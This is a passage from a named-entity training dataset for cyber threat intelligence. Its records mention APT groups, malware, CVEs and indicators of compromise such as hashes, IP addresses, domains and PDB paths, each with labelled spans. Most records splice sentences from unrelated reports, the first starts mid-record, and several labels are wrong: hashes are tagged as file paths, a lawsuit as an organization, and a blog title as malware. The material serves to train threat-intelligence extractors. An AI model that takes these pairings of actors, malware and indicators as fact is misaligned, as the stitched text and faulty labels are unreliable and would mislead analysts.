We recommend checking the following for potential evidence of compromise : • Child processes of on Exchange Servers , particularly .", "spans": {"MALWARE: Agent Smith": [[21, 32]], "SYSTEM: 9Apps": [[96, 101]], "TOOL: Badnews malware": [[200, 215]], "THREAT_ACTOR: Patchwork": [[472, 481]], "MALWARE: Dexphot": [[497, 504]], "TOOL: DLLs": [[578, 582]], "FILEPATH: rundll32.exe": [[593, 605]]}, "info": {"id": "cyberner_stix_train_003895", "source": "cyberner_stix_train"}} {"text": "] 205 [ . Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy backdoor access to victim environments for at least two years . This variant ( the metadata for which is listed below ) is Gandcrab version . Cisco , Microsoft , and other tech companies have joined in supporting Meta 's lawsuit against the NSO Group referenced above through court filings .", "spans": {"ORGANIZATION: Mandiant": [[10, 18]], "THREAT_ACTOR: attackers": [[53, 62]], "THREAT_ACTOR: APT29": [[63, 68]], "MALWARE: Gandcrab": [[242, 250]], "ORGANIZATION: Cisco": [[261, 266]], "ORGANIZATION: Microsoft": [[269, 278]], "ORGANIZATION: Meta 's lawsuit": [[332, 347]]}, "info": {"id": "cyberner_stix_train_003896", "source": "cyberner_stix_train"}} {"text": "CSIS provided a ( sanitised ) version of a typical message to warn users what to look out for : “ You have received a multimedia message from + [ country code ] [ sender number ] Follow the link http : //www.mmsforyou [ . Back in 2013 , CopyKittens used several Facebook profiles to spread links to a website impersonating Haaretz news , an Israeli newspaper . 
event ( according to Hex-Rays , The four - byte value at offset 0x416 ( 0x3e8 or decimal 1000 ) is the backdoor ’s version number .", "spans": {"ORGANIZATION: CSIS": [[0, 4]], "THREAT_ACTOR: CopyKittens": [[237, 248]], "ORGANIZATION: Facebook": [[262, 270]], "TOOL: Hex-Rays": [[382, 390]]}, "info": {"id": "cyberner_stix_train_003897", "source": "cyberner_stix_train"}} {"text": "10 million Android phones infected by all-powerful auto-rooting apps First detected in November , Shedun/HummingBad infections are surging . Around 55% of the victims of Lazarus were located in India and neighboring countries . APT33 : 8.26.21.120 [REDACTED].ddns.net . Through this entry , in which we take a closer look at an individual who we believe might be connected to the Winnti group , we hope to give both ordinary users and organizations better insights into some of the tools – notably the server infrastructures- these kinds of threat actors use , as well as the scale in which they operate .", "spans": {"SYSTEM: Android": [[11, 18]], "MALWARE: Shedun/HummingBad": [[98, 115]], "THREAT_ACTOR: Lazarus": [[170, 177]], "THREAT_ACTOR: APT33": [[228, 233]], "IP_ADDRESS: 8.26.21.120": [[236, 247]], "DOMAIN: [REDACTED].ddns.net": [[248, 267]], "THREAT_ACTOR: Winnti group": [[380, 392]], "ORGANIZATION: ordinary users": [[416, 430]], "ORGANIZATION: organizations": [[435, 448]], "TOOL: tools": [[482, 487]], "SYSTEM: server infrastructures-": [[502, 525]], "THREAT_ACTOR: threat actors": [[541, 554]]}, "info": {"id": "cyberner_stix_train_003898", "source": "cyberner_stix_train"}} {"text": "This diagram illustrates the whole process . The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates . APT17 : 121.101.73.231 . 
Clients using Internet Explorer version 8 are served with “ about.htm ” , for other versions of the browser and for any other browser capable of running Java applets , the JavaScript code loads “ JavaApplet.html ” .", "spans": {"THREAT_ACTOR: PassCV group": [[49, 61]], "THREAT_ACTOR: APT17": [[203, 208]], "IP_ADDRESS: 121.101.73.231": [[211, 225]], "SYSTEM: Internet Explorer version 8": [[242, 269]]}, "info": {"id": "cyberner_stix_train_003899", "source": "cyberner_stix_train"}} {"text": "The multi-step malware framework caused industrial systems in a Middle Eastern industrial facility to shut down .", "spans": {}, "info": {"id": "cyberner_stix_train_003900", "source": "cyberner_stix_train"}} {"text": "Additionally , it also writes addresses of dlopen , dlsym , and dlclose into the same region , so that they can be used by the shellcode . As confirmation that the malware writers are still very active even at the time of this writing , ESET detected a new Potao sample compiled on July 20 , 2015 . APT17 : ac169b7d4708c6fa7fee9be5f7576414 . The second webpage , “ sidebar.html ” contains 88 lines , mostly JavaScript code , and works as a primitive exploit pack .", "spans": {"ORGANIZATION: ESET": [[237, 241]], "TOOL: Potao sample": [[257, 269]], "THREAT_ACTOR: APT17": [[299, 304]], "FILEPATH: ac169b7d4708c6fa7fee9be5f7576414": [[307, 339]]}, "info": {"id": "cyberner_stix_train_003901", "source": "cyberner_stix_train"}} {"text": "Whitelisting is one of the best security strategies because it allows only specified programs to run while blocking all others , including malicious software .", "spans": {"MALWARE: malicious software": [[139, 157]]}, "info": {"id": "cyberner_stix_train_003902", "source": "cyberner_stix_train"}} {"text": "However , thanks to the infrastructure sharing and forgotten panel names , we assess with high confidence that this actor is still active , it is still developing malware and has been using it from mid-June to today . 
The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat . It should also be noted that this campaign used CVE-2009-4324 and CVE-2011-0609 exploits when these were still unpatched or considered zero-day vulnerabilities . FakeSG has different browser templates depending on which browser the victim is running .", "spans": {"TOOL: Windows 10 Creators Update": [[222, 248]], "ORGANIZATION: Windows Defender ATP": [[284, 304]], "ORGANIZATION: SOC personnel": [[323, 336]], "VULNERABILITY: CVE-2009-4324": [[446, 459]], "VULNERABILITY: CVE-2011-0609": [[464, 477]], "VULNERABILITY: zero-day": [[533, 541]], "MALWARE: FakeSG": [[560, 566]]}, "info": {"id": "cyberner_stix_train_003903", "source": "cyberner_stix_train"}} {"text": "Unfortunately , without the email message , we don’t know if there are any instructions for the user , if there is any further social engineering , or if it relies solely on the victim ’s curiosity .", "spans": {"TOOL: email": [[28, 33]]}, "info": {"id": "cyberner_stix_train_003904", "source": "cyberner_stix_train"}} {"text": "SHA256 : 1ac624aaf6bbc2e3b966182888411f92797bd30b6fcce9f8a97648e64f13506f .", "spans": {"FILEPATH: 1ac624aaf6bbc2e3b966182888411f92797bd30b6fcce9f8a97648e64f13506f": [[9, 73]]}, "info": {"id": "cyberner_stix_train_003905", "source": "cyberner_stix_train"}} {"text": "It only has two parts , the method indicated by word “ info ” and the victim identifier . Since our first published analysis of the OilRig campaign in May 2016 , we have continued to monitor this group for new activity . Gamaredon : http://masseffect.space/ . 
Researchers at Cisco Talos recently wrote an ‘ On the Radar ’ article about the growth of spyware - based intelligence providers , without legal or ethical supervision .", "spans": {"THREAT_ACTOR: group": [[196, 201]], "THREAT_ACTOR: Gamaredon": [[221, 230]], "URL: http://masseffect.space/": [[233, 257]], "ORGANIZATION: Cisco Talos": [[275, 286]]}, "info": {"id": "cyberner_stix_train_003906", "source": "cyberner_stix_train"}} {"text": "All recent FakeSpy versions contain the same code with minor changes . Recorded Future has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) . During that time they poked 70 internal hosts , compromised 56 accounts , making their ACT from 139 attack sources ( TOR and compromised home routers ) .", "spans": {"MALWARE: FakeSpy": [[11, 18]], "ORGANIZATION: Recorded Future": [[71, 86]], "THREAT_ACTOR: APT33": [[107, 112]]}, "info": {"id": "cyberner_stix_train_003907", "source": "cyberner_stix_train"}} {"text": "The number of supported commands has increased over time , with the latest version of the backdoor having more than thirty .", "spans": {}, "info": {"id": "cyberner_stix_train_003908", "source": "cyberner_stix_train"}} {"text": "In 2018 , hundreds of thousands of home and small business networking and storage devices were compromised and loaded with the so-called “ VPN Filter ” malware .", "spans": {"MALWARE: VPN Filter": [[139, 149]]}, "info": {"id": "cyberner_stix_train_003909", "source": "cyberner_stix_train"}} {"text": "Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance . 
A current round of cyber-attacks from Chinese source groups are targeting the maritime sector in an attempt to steal technology .", "spans": {"VULNERABILITY: Niteris exploit": [[45, 60]], "ORGANIZATION: banks": [[103, 108]], "ORGANIZATION: maritime sector": [[293, 308]]}, "info": {"id": "cyberner_stix_train_003910", "source": "cyberner_stix_train"}} {"text": "This trojan is highly evolved in its design . The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims . North Korean defector and human rights-related targeting provides further evidence that APT37 conducts operations aligned with the interests of North Korea .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[72, 83]], "THREAT_ACTOR: APT37": [[252, 257]]}, "info": {"id": "cyberner_stix_train_003911", "source": "cyberner_stix_train"}} {"text": "] 27 [ . This intelligence has been critical to protecting and informing our clients , exposing this threat , and strengthening our confidence in attributing APT28 to the Russian Government . An exception counter is used to track the number of exceptions and will exit the send loop if a threshold is . In one exchange on Aug. 
16 , 2012 , Ashley Madison ’s director of IT was asked to produce a list of all company employees with all - powerful administrator access .", "spans": {"THREAT_ACTOR: APT28": [[158, 163]], "ORGANIZATION: Ashley Madison ’s director of IT": [[339, 371]]}, "info": {"id": "cyberner_stix_train_003912", "source": "cyberner_stix_train"}} {"text": "This exploration required a look at the suspect cmd.exe 's parent process , shown earlier in the investigation to be ACLIENT.EXE .", "spans": {"FILEPATH: cmd.exe": [[48, 55]], "FILEPATH: ACLIENT.EXE": [[117, 128]]}, "info": {"id": "cyberner_stix_train_003914", "source": "cyberner_stix_train"}} {"text": "We are especially delighted about the platform and programme of work established in the declaration of the conference , upon which we sincerely hope will be built a strong and resolute working relationship on our shared goals for the future . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 . 
More details about the cloak and dagger games between Naikon and Hellsing can be found in our blogpost : \" The Chronicles of the Hellsing APT : The Empire Strikes Back \" .", "spans": {"ORGANIZATION: Kaspersky": [[260, 269]], "VULNERABILITY: zero-day exploit": [[295, 311]], "THREAT_ACTOR: BlackOasis": [[320, 330]], "THREAT_ACTOR: Naikon": [[439, 445]], "THREAT_ACTOR: Hellsing": [[450, 458]], "THREAT_ACTOR: Hellsing APT": [[514, 526]], "MALWARE: Empire Strikes Back": [[533, 552]]}, "info": {"id": "cyberner_stix_train_003915", "source": "cyberner_stix_train"}} {"text": "This secondary email account is unknown at this time , so we will refer to it as “ secondary email account ” in future steps .", "spans": {"TOOL: email": [[15, 20], [93, 98]]}, "info": {"id": "cyberner_stix_train_003916", "source": "cyberner_stix_train"}} {"text": "Falcon Intelligence has acquired multiple decryption tools related to BitPaymer , which confirm the theory that a unique key is used for each infection . Currently , the group is engaged in two major operations : Operation Daybreak and Operation Erebus .", "spans": {"ORGANIZATION: Falcon Intelligence": [[0, 19]], "TOOL: BitPaymer": [[70, 79]]}, "info": {"id": "cyberner_stix_train_003917", "source": "cyberner_stix_train"}} {"text": "Infection chain The threat actors behind this version used several fake websites as their host — copying that of a Japanese mobile phone operator ’ s website in particular — to trick users into downloading the fake security Android application package ( APK ) . This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose . 0011.ps1 042F60714E9347DB422E1A3A471DC0301D205FFBD053A4015D2B509DB92029D1 . 
If the main function is called with only , it will only perform its cleanup routine and immediately terminate .", "spans": {"SYSTEM: Android": [[224, 231]], "ORGANIZATION: FireEye": [[287, 294]], "THREAT_ACTOR: group": [[313, 318]], "THREAT_ACTOR: hackers": [[336, 343]], "THREAT_ACTOR: admin@338": [[351, 360]], "THREAT_ACTOR: attackers": [[420, 429]], "ORGANIZATION: government officials": [[439, 459]], "THREAT_ACTOR: cyber espionage": [[495, 510]], "FILEPATH: 0011.ps1": [[521, 529]], "FILEPATH: 042F60714E9347DB422E1A3A471DC0301D205FFBD053A4015D2B509DB92029D1": [[530, 594]]}, "info": {"id": "cyberner_stix_train_003918", "source": "cyberner_stix_train"}} {"text": "Extract the calls log . ASERT has learned of an APT campaign , possibly originating from DPRK , we are calling STOLEN PENCIL that is targeting academic institutions since at least May 2018 . Since December 2019 , the Cybereason Nocturnus team has been investigating a campaign targeting Palestinian individuals and entities in the Middle East , mostly within the Palestinian territories . If more groups start adopting CL0P 's zero - day exploitation techniques , the ransomware landscape could tilt from service - oriented attacks to a more aggressive , vulnerability - focused model — a move that could skyrocket the number of victims .", "spans": {"ORGANIZATION: ASERT": [[24, 29]], "ORGANIZATION: academic institutions": [[143, 164]], "ORGANIZATION: Cybereason Nocturnus": [[217, 237]], "THREAT_ACTOR: CL0P 's zero - day exploitation techniques": [[419, 461]]}, "info": {"id": "cyberner_stix_train_003919", "source": "cyberner_stix_train"}} {"text": "The adware activity impersonates Facebook ( left ) . Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . 
Advanced Malware Protection ( AMP ) is ideally suited to prevent the execution of the malware used by these threat actors .", "spans": {"ORGANIZATION: Facebook": [[33, 41]], "VULNERABILITY: CVE-2017-1099": [[124, 137]], "MALWARE: RTF attachments": [[153, 168]], "TOOL: Advanced Malware Protection": [[180, 207]], "TOOL: AMP": [[210, 213]]}, "info": {"id": "cyberner_stix_train_003920", "source": "cyberner_stix_train"}} {"text": "Financially motivated APT groups which focus efforts on targeted attacks on the financial sector such as — Anunak , Corkow , Buhtrap — usually managed botnets using developed or modified banking Trojans . this SWC was used to specifically target Turkish academic networks .", "spans": {"ORGANIZATION: financial sector": [[80, 96]], "TOOL: Corkow": [[116, 122]], "ORGANIZATION: banking": [[187, 194]]}, "info": {"id": "cyberner_stix_train_003921", "source": "cyberner_stix_train"}} {"text": "We have not yet identified FIN7’s ultimate goal in this campaign , as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft . The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": {"THREAT_ACTOR: FIN7’s": [[27, 33]], "MALWARE: malicious emails": [[113, 129]], "ORGANIZATION: financial": [[298, 307]], "ORGANIZATION: policy organizations": [[312, 332]], "TOOL: emails": [[372, 378]], "ORGANIZATION: audiences": [[421, 430]]}, "info": {"id": "cyberner_stix_train_003922", "source": "cyberner_stix_train"}} {"text": "This threat group has conducted broad targeting across a variety of industries , including financial , government , energy , chemical , and telecommunications , and has largely focused its operations within the Middle East . 
Of all the major browsers , only Safari uses the system ’s certificates .", "spans": {"THREAT_ACTOR: threat group": [[5, 17]], "ORGANIZATION: financial": [[91, 100]], "ORGANIZATION: government": [[103, 113]], "ORGANIZATION: energy": [[116, 122]], "ORGANIZATION: chemical": [[125, 133]], "ORGANIZATION: telecommunications": [[140, 158]], "TOOL: browsers": [[242, 250]], "TOOL: Safari": [[258, 264]]}, "info": {"id": "cyberner_stix_train_003923", "source": "cyberner_stix_train"}} {"text": "Emulator and location conditions for the malware ’ s activity Check Point Mobile Threat Prevention customers are protected from Charger and similar malware . Based on file modification dates and timestamps of samples , it appears that the observed campaign was initiated in the middle of February 2016 , with the infrastructure taken offline at the start of March . This set of activity relied on open-source tools , such as Powershell Empire , and well-documented red teaming techniques , in order to get a foothold within the victim’s networks and avoid detection . Unfortunately , the CSP policy ca n’t discriminate based on the Tag ID .", "spans": {"ORGANIZATION: Check Point": [[62, 73]], "MALWARE: Charger": [[128, 135]], "TOOL: Powershell": [[425, 435]], "TOOL: Empire": [[436, 442]], "SYSTEM: CSP": [[588, 591]]}, "info": {"id": "cyberner_stix_train_003924", "source": "cyberner_stix_train"}} {"text": "This kind of “ moving target ” behavior made it harder to track their actions . APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts from trusted third parties , sometimes coupled with social engineering tactics . The documents are located on Google Drive . 
Malwarebytes found that a total of 48 separate ransomware groups attacked the US in the observed period .", "spans": {"THREAT_ACTOR: APT34": [[80, 85]], "TOOL: public and non-public tools": [[100, 127]], "TOOL: compromised accounts": [[179, 199]], "TOOL: Google Drive": [[310, 322]], "ORGANIZATION: Malwarebytes": [[325, 337]]}, "info": {"id": "cyberner_stix_train_003925", "source": "cyberner_stix_train"}} {"text": "] 230 [ . The Dukes continued the expansion of their arsenal in 2011 with the addition of two more toolsets : MiniDuke and CozyDuke . The payloads that are downloaded in the above steps are then executed on the system . While a threat actor can choose only to access a single account from a single source IP address , Mandiant has observed that multiple accounts were accessed within hours from the same source IP address by a threat actor .", "spans": {"THREAT_ACTOR: Dukes": [[14, 19]], "TOOL: MiniDuke": [[110, 118]], "TOOL: CozyDuke": [[123, 131]]}, "info": {"id": "cyberner_stix_train_003926", "source": "cyberner_stix_train"}} {"text": "Of note , in addition to tracking the compromised device ’ s location , HenBox also harvests all outgoing phone numbers with an “ 86 ” prefix , which is the country code for the People ’ s Republic of China ( PRC ) . Turla is perhaps most notoriously suspected as responsible for the breach of the United States Central Command in 2008 . The admin@338 's Dropbox accounts have also been found to contain a different backdoor dubbed BUBBLEWRAP .", "spans": {"MALWARE: HenBox": [[72, 78]], "THREAT_ACTOR: Turla": [[217, 222]], "THREAT_ACTOR: admin@338": [[342, 351]], "TOOL: Dropbox": [[355, 362]], "MALWARE: BUBBLEWRAP": [[432, 442]]}, "info": {"id": "cyberner_stix_train_003927", "source": "cyberner_stix_train"}} {"text": "Insikt Group investigated the domain and hosting infrastructure used by the APT33 group . 
Silence sent out emails to Russian banks .", "spans": {"ORGANIZATION: Insikt Group": [[0, 12]], "THREAT_ACTOR: APT33": [[76, 81]], "THREAT_ACTOR: Silence": [[90, 97]], "TOOL: emails": [[107, 113]], "ORGANIZATION: banks": [[125, 130]]}, "info": {"id": "cyberner_stix_train_003928", "source": "cyberner_stix_train"}} {"text": "The company develops mobile apps for both Android and iOS platforms . We assess with high confidence that the attackers discussed here are associated with the Chinese state intelligence apparatus . Otherwise , the ZxShell code closes the socket used and sleeps for 30 seconds . Maybe the text in the email jokes about the trip you took last week and how you came back sunburnt .", "spans": {"SYSTEM: Android": [[42, 49]], "SYSTEM: iOS": [[54, 57]], "MALWARE: ZxShell": [[214, 221]]}, "info": {"id": "cyberner_stix_train_003929", "source": "cyberner_stix_train"}} {"text": "By targeting all of these organizations together , Suckfly could have had a much larger impact on India and its economy .", "spans": {"THREAT_ACTOR: Suckfly": [[51, 58]]}, "info": {"id": "cyberner_stix_train_003930", "source": "cyberner_stix_train"}} {"text": "In August 2017 , a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K. 's National Health Service ( NHS ) , with a high ransom demand of 53 BTC ( approximately $200,000 USD ) . 
The banking malware GozNym has legs ; only a few weeks after the hybrid Trojan was discovered , it has reportedly spread into Europe and begun plaguing banking customers in Poland with redirection attacks .", "spans": {"TOOL: BitPaymer": [[56, 65]], "ORGANIZATION: National Health Service": [[108, 131]], "ORGANIZATION: NHS": [[134, 137]], "MALWARE: GozNym": [[231, 237]], "MALWARE: Trojan": [[283, 289]], "ORGANIZATION: banking customers": [[363, 380]]}, "info": {"id": "cyberner_stix_train_003931", "source": "cyberner_stix_train"}} {"text": "However , by analyzing the dates when we first saw the certificates paired with hacktools or malware , we can gain insight into when the certificates may have been stolen .", "spans": {}, "info": {"id": "cyberner_stix_train_003932", "source": "cyberner_stix_train"}} {"text": "At this stage , we have two similar , parallel constructions of events – the how behind the immediate deployment and execution of TRITON S-MAL/TRISIS – yet dramatically different responses in terms of attribution and labeling .", "spans": {"MALWARE: TRITON S-MAL/TRISIS": [[130, 149]]}, "info": {"id": "cyberner_stix_train_003933", "source": "cyberner_stix_train"}} {"text": "File collection module ( “ USB Stealer ” ) Internal name : msdetltemp.dll ( from resources ) File size : 50,176 bytes File format : PE32 EXE MD5: 0369620eb139c3875a62e36bb7abdae8 Linker version : 10.0 , Microsoft Visual Studio Linker timestamp : 2015.02.09 11:48:01 ( GMT ) Most of the strings inside the binary are encrypted using 3DES and XOR and reversed .", "spans": {"TOOL: USB Stealer": [[27, 38]], "FILEPATH: msdetltemp.dll": [[59, 73]], "TOOL: EXE": [[137, 140]], "FILEPATH: 0369620eb139c3875a62e36bb7abdae8": [[146, 178]], "ORGANIZATION: Microsoft": [[203, 212]], "TOOL: Visual Studio": [[213, 226]], "TOOL: GMT": [[268, 271]]}, "info": {"id": "cyberner_stix_train_003934", "source": "cyberner_stix_train"}} {"text": "Most of the compile times are within the past two months , with 6 in 
August and a couple from as recently as two days ago at the time of this writing . 29c7740f487a461a96fad1c8db3921ccca8cc3e7548d44016da64cf402a475ad 2016-12-10 01 . d5e56b9b5f52293b209a60c2ccd0ade6c883f9d3ec09571a336a3a4d4c79134b 2016-12-10 03 C:\\RAMDrive\\Charles\\heaven\\reams\\Teac.pdb . dd5f237153856d19cf20e80ff8238ca42047113c44fae27b5c3ad00be2755eea 2016-12-10 16 C:\\Cleaner\\amuse\\rang\\AutoPopulate\\la.pdb . a5001e9b29078f532b1a094c8c16226d20c03922e37a4fca2e9172350bc160a0 2016-12-20 18 . 8284ec768a06b606044defe2c2da708ca6b3b51f8e58cb66f61bfca56157bc88 2017-07-05 10 . f0ce51eb0e6c33fdb8e1ccb36b9f42139c1dfc58d243195aedc869c7551a5f89 2017-07-09 20 C:\\TableAdapter\\encyclopedia\\Parik.pdb . 145d47f4c79206c6c9f74b0ab76c33ad0fd40ac6724b4fac6f06afec47b307c6 2017-07-10 08 C:\\ayakhnin\\reprductive\\distortedc.pdb . dc8f34829d5fede991b478cf9117fb18c32d639573a827227b2fc50f0b475085 2017-07-11 01 C:\\positioning\\scrapping\\Szets\\thi.pdb . 7fe1069c118611113b4e34685e7ee58cb469bda4aa66a22db10842c95f332c77 2017-07-11 02 C:\\NeXT\\volatile\\legacyExchangeDNs.pdb . 5edf117e7f8cd176b1efd0b5fd40c6cd530699e7a280c5c7113d06e9c21d6976 2017-07-12 23 . 2a80fdda87127bdc56fd35c3e04eb64a01a159b7b574177e2e346439c97b770a 2017-07-13 00. a9021e253ae52122cbcc2284b88270ceda8ad9647515d6cca96db264a76583f5 2017-07-18 00 . dd639d76ff6f33bbfaf3bd398056cf4e95e27822bd9476340c7703f5b38e0183 2017-07-18 00 . e5a00b49d4ab3e5a3a8f60278b9295f3d252e3e04dadec2624bb4dcb2eb0fada 2017-07-24 17 . 6263730ef54fbed0c2d3a7c6106b6e8b12a6b2855a03e7caa8fb184ed1eabeb2 2017-07-24 22 C:\\Snapshot\\Diskette\\hiding\\ROCKMA.pdb . 43bfaf9a2a4d46695bb313a32d88586c510d040844f29852c755845a5a09d9df 2017-07-25 06 . b41660db6dcb0d3c7b17f98eae3141924c8c0ee980501ce541b42dc766f85628 2017-07-25 06 C:\\mdb\\Changed\\Container\\praise.pdb . 9acdad02ca8ded6043ab52b4a7fb2baac3a08c9f978ce9da2eb51c816a9e7a2e 2017-07-25 07 . 
2ddaa30ba3c3e625e21eb7ce7b93671ad53326ef8b6e2bc20bc0d2de72a3929d 2017-07-25 20 C:\\helpers\\better\\Expr\\Eight\\DS.pdb . b836576877b2fcb3cacec370e5e6a029431f59d5070da89d94200619641ca0c4 2017-07-26 12 C:\\V\\regard\\violates\\update\\AMBW\\a.pdb . 0972fc9602b00595e1022d9cfe7e9c9530d4e9adb5786fea830324b3f7ff4448 2017-07-26 20 . 2c258ac862d5e31d8921b64cfa7e5a9cd95cca5643c9d51db4c2fcbe75fa957a 2017-07-27 01 C:\\executablery\\constructed\\IIc.pdb . dd9c558ba58ac81a2142ecb308ac8d0f044c7059a039d2e367024d953cd14a00 2017-07-27 02 . cb3173a820ac392005de650bbd1dd24543a91e72d4d56300a7795e887a8323b2 2017-07-31 14 C:\\letterbxing\\EVP\\Chices\\legit.pdb . a636f49814ea6603534f780b83a5d0388f5a5d0eb848901e1e1bf2d19dd84f05 2017-07-31 18 C:\\Biomuse\\moment\\705\\cnvincing.pdb . 677dd11912a0f13311d025f88caabeeeb1bda27c7c1b5c78cffca36de46e8560 2017-07-31 21 . fdedf0f90d42d3779b07951d1e8826c7015b3f3e724ab89e350c9608e1f23852 2017-08-01 21 . 142bf7f47bfbd592583fbcfa22a25462df13da46451b17bb984d50ade68a5b17 2017-08-02 09 . 6f4b2c95b1a0f320da1b1eaa918c338c0bab5cddabe169f12ee734243ed8bba8 2017-08-02 12 C:\\cataloging\\Dr\\VarianceShadows11.pdb . fd5fd7058cf157ea249d4dcba71331f0041b7cf8fd635f37ad13aed1b06bebf2 2017-08-04 02 C:\\dumplings\\That\\BIT\\Warez\\loc.pdb . 5785c2d68d6f669b96c3f31065f0d9804d2ab1f333a90d225bd993e66656b7d9 2017-08-07 12 C:\\Lgisys\\hypothesized\\donatedc.pdb . 
675719a9366386034c285e99bf33a1a8bafc7644874b758f307d9a288e95bdbd 2017-08-07 17 C:\\work\\cr\\nata\\cpp\\seven\\seven\\release\\seven.pdb .", "spans": {"FILEPATH: 29c7740f487a461a96fad1c8db3921ccca8cc3e7548d44016da64cf402a475ad": [[152, 216]], "FILEPATH: d5e56b9b5f52293b209a60c2ccd0ade6c883f9d3ec09571a336a3a4d4c79134b": [[233, 297]], "FILEPATH: dd5f237153856d19cf20e80ff8238ca42047113c44fae27b5c3ad00be2755eea": [[356, 420]], "FILEPATH: a5001e9b29078f532b1a094c8c16226d20c03922e37a4fca2e9172350bc160a0": [[479, 543]], "FILEPATH: 8284ec768a06b606044defe2c2da708ca6b3b51f8e58cb66f61bfca56157bc88": [[560, 624]], "FILEPATH: f0ce51eb0e6c33fdb8e1ccb36b9f42139c1dfc58d243195aedc869c7551a5f89": [[641, 705]], "FILEPATH: 145d47f4c79206c6c9f74b0ab76c33ad0fd40ac6724b4fac6f06afec47b307c6": [[761, 825]], "FILEPATH: dc8f34829d5fede991b478cf9117fb18c32d639573a827227b2fc50f0b475085": [[881, 945]], "FILEPATH: 7fe1069c118611113b4e34685e7ee58cb469bda4aa66a22db10842c95f332c77": [[1001, 1065]], "FILEPATH: 5edf117e7f8cd176b1efd0b5fd40c6cd530699e7a280c5c7113d06e9c21d6976": [[1121, 1185]], "FILEPATH: 2a80fdda87127bdc56fd35c3e04eb64a01a159b7b574177e2e346439c97b770a": [[1202, 1266]], "FILEPATH: a9021e253ae52122cbcc2284b88270ceda8ad9647515d6cca96db264a76583f5": [[1282, 1346]], "FILEPATH: dd639d76ff6f33bbfaf3bd398056cf4e95e27822bd9476340c7703f5b38e0183": [[1363, 1427]], "FILEPATH: e5a00b49d4ab3e5a3a8f60278b9295f3d252e3e04dadec2624bb4dcb2eb0fada": [[1444, 1508]], "FILEPATH: 6263730ef54fbed0c2d3a7c6106b6e8b12a6b2855a03e7caa8fb184ed1eabeb2": [[1525, 1589]], "FILEPATH: 43bfaf9a2a4d46695bb313a32d88586c510d040844f29852c755845a5a09d9df": [[1645, 1709]], "FILEPATH: b41660db6dcb0d3c7b17f98eae3141924c8c0ee980501ce541b42dc766f85628": [[1726, 1790]], "FILEPATH: 9acdad02ca8ded6043ab52b4a7fb2baac3a08c9f978ce9da2eb51c816a9e7a2e": [[1843, 1907]], "FILEPATH: 2ddaa30ba3c3e625e21eb7ce7b93671ad53326ef8b6e2bc20bc0d2de72a3929d": [[1924, 1988]], "FILEPATH: b836576877b2fcb3cacec370e5e6a029431f59d5070da89d94200619641ca0c4": 
[[2041, 2105]], "FILEPATH: 0972fc9602b00595e1022d9cfe7e9c9530d4e9adb5786fea830324b3f7ff4448": [[2161, 2225]], "FILEPATH: 2c258ac862d5e31d8921b64cfa7e5a9cd95cca5643c9d51db4c2fcbe75fa957a": [[2242, 2306]], "FILEPATH: dd9c558ba58ac81a2142ecb308ac8d0f044c7059a039d2e367024d953cd14a00": [[2359, 2423]], "FILEPATH: cb3173a820ac392005de650bbd1dd24543a91e72d4d56300a7795e887a8323b2": [[2440, 2504]], "FILEPATH: a636f49814ea6603534f780b83a5d0388f5a5d0eb848901e1e1bf2d19dd84f05": [[2557, 2621]], "FILEPATH: 677dd11912a0f13311d025f88caabeeeb1bda27c7c1b5c78cffca36de46e8560": [[2674, 2738]], "FILEPATH: fdedf0f90d42d3779b07951d1e8826c7015b3f3e724ab89e350c9608e1f23852": [[2755, 2819]], "FILEPATH: 142bf7f47bfbd592583fbcfa22a25462df13da46451b17bb984d50ade68a5b17": [[2836, 2900]], "FILEPATH: 6f4b2c95b1a0f320da1b1eaa918c338c0bab5cddabe169f12ee734243ed8bba8": [[2917, 2981]], "FILEPATH: fd5fd7058cf157ea249d4dcba71331f0041b7cf8fd635f37ad13aed1b06bebf2": [[3037, 3101]], "FILEPATH: 5785c2d68d6f669b96c3f31065f0d9804d2ab1f333a90d225bd993e66656b7d9": [[3154, 3218]], "FILEPATH: 675719a9366386034c285e99bf33a1a8bafc7644874b758f307d9a288e95bdbd": [[3271, 3335]]}, "info": {"id": "cyberner_stix_train_003936", "source": "cyberner_stix_train"}} {"text": "The PowerShell version of the Trojan also has the ability to get screenshots . 
This blog post examines two similar malware families that utilize the aforementioned technique to abuse legitimate websites , their connections to each other , and their connections to known espionage campaigns .", "spans": {"MALWARE: PowerShell": [[4, 14]]}, "info": {"id": "cyberner_stix_train_003937", "source": "cyberner_stix_train"}} {"text": "Its presence on a compromised system allows a threat actor to spawn a reverse shell , upload or download files , and capture keystrokes .", "spans": {}, "info": {"id": "cyberner_stix_train_003938", "source": "cyberner_stix_train"}} {"text": "In previous incidents involving this threat actor , we observed them using malicious documents hosted on websites about the Indian Army , instead of sending these documents directly as an email attachment . In most cases , the attackers only had to infect the computer on which the RBS software was installed in order to start stealing the cash .", "spans": {"ORGANIZATION: Indian Army": [[124, 135]]}, "info": {"id": "cyberner_stix_train_003939", "source": "cyberner_stix_train"}} {"text": "] today admin [ .databit [ .today cendata [ . In December 2012 Mofang started a campaign against a new target , called ' seg ' for the purpose of this report . The sample cb3dcde34fd9ff0e19381d99b02f9692 connected to documents.myPicture.info and www.documents.myPicture.info and as expected generated the a POST request to /bbs/ info.asp . 
